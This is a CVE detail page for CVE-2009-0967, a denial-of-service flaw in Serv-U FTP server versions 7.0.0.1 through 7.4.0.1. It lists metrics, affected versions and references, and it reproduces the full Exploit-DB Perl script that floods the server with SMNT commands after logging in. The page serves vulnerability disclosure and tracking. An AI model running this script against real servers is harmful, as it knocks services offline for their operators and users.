CVE-2009-0967 : Detail

CVE-2009-0967

0.92%V4
Network
2009-03-19
09h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The FTP server in Serv-U 7.0.0.1 through 7.4.0.1 allows remote authenticated users to cause a denial of service (service hang) via a large number of SMNT commands without an argument.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8212

Publication date : 2009-03-15 23h00 +00:00
Author : Jonathan Salwan
EDB Verified : Yes

#!/usr/bin/perl # Soft : FTP Serv-U # Version : v7.4.0.1 # # Denial of Service in Serv-u up to 7.4.0.1 (no crash) # Just the server is saturated, it stops responding. # # Author: Jonathan Salwan # Mail: submit [AT] shell-storm.org # Web: http://www.shell-storm.org use IO::Socket; print "[+] Author : Jonathan Salwan \n"; print "[+] Soft: FTP Serv-U\n"; if (@ARGV < 3) { print "[*] Usage: <serv-u.pl> <host> <port>\n"; print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n"; print "\n[+] Connecting: Ok!\n"; print "[+] Sending request...\n"; $evil = "SMNT\r\n" x 300000; $after = "\x2A\x2A"; print $socket "USER $user\r\n"; print $socket "PASS $pass.$after\r\n"; print $socket "$evil"; sleep(1); close($socket); print "[+]Done! the server is saturated.\n"; # milw0rm.com [2009-03-16]

Products Mentioned

Configuraton 0

Solarwinds>>Serv-u_file_server >> Version 7.0.0.1

Solarwinds>>Serv-u_file_server >> Version 7.0.0.2

Solarwinds>>Serv-u_file_server >> Version 7.0.0.3

Solarwinds>>Serv-u_file_server >> Version 7.0.0.4

Solarwinds>>Serv-u_file_server >> Version 7.1.0.0

Solarwinds>>Serv-u_file_server >> Version 7.1.0.1

Solarwinds>>Serv-u_file_server >> Version 7.1.0.2

Solarwinds>>Serv-u_file_server >> Version 7.2.0.0

Solarwinds>>Serv-u_file_server >> Version 7.2.0.1

Solarwinds>>Serv-u_file_server >> Version 7.3.0.0

Solarwinds>>Serv-u_file_server >> Version 7.3.0.1

Solarwinds>>Serv-u_file_server >> Version 7.3.0.2

Solarwinds>>Serv-u_file_server >> Version 7.4.0.0

Solarwinds>>Serv-u_file_server >> Version 7.4.0.1

References

https://www.exploit-db.com/exploits/8212
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/34127
Tags : vdb-entry, x_refsource_BID